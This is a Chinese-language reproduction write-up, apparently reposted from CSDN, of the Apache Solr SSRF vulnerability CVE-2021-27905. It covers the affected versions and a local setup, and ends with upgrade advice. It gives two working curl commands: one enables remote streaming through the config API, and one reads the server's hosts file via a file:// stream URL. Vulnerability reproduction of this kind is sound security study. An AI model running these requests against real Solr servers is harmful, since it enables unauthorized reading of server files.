ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Apache Solr SSRF 漏洞(CVE-2021-27905)复现

2021-04-16 17:02:02  阅读:627  来源: 互联网

标签:core SSRF Solr 27905 2021 8983 Apache new solr


漏洞概述

 

Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。

 

该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。

 

影响版本

Apache Solr <= 8.8.1

 

环境搭建

 

http://archive.apache.org/dist/lucene/solr/8.8.1/

解压完成后,进入bin目录,执行

solr start -p 8983

访问your-ip:8983即可看到页面

点击左侧的Core Admin来创建一个Core,可以发现报错

此时Solr已经在server/solr目录下已经创建了名字为new_core的文件夹,我们只需要把server/solr/configsets/default文件夹下的conf目录整个拷贝到new_core文件夹下,即可

此时即可创建成功

 

漏洞复现

 

通过http://192.168.1.103:8983/solr/admin/cores?indexInfo=false&wt=json可以看到core的名字

通过Solr提供的API可以开启远程开启文件流读取

curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.1.103:8983/solr/new_core/config -H 'Content-type:application/json'

读取本机的hosts的文件

curl "http://192.168.1.103:8983/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"

 

修复建议

 

升级到最新版本

下载地址:

https://solr.apache.org/downloads.html

 

标签:core,SSRF,Solr,27905,2021,8983,Apache,new,solr
来源: https://blog.csdn.net/xuandao_ahfengren/article/details/115767158

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有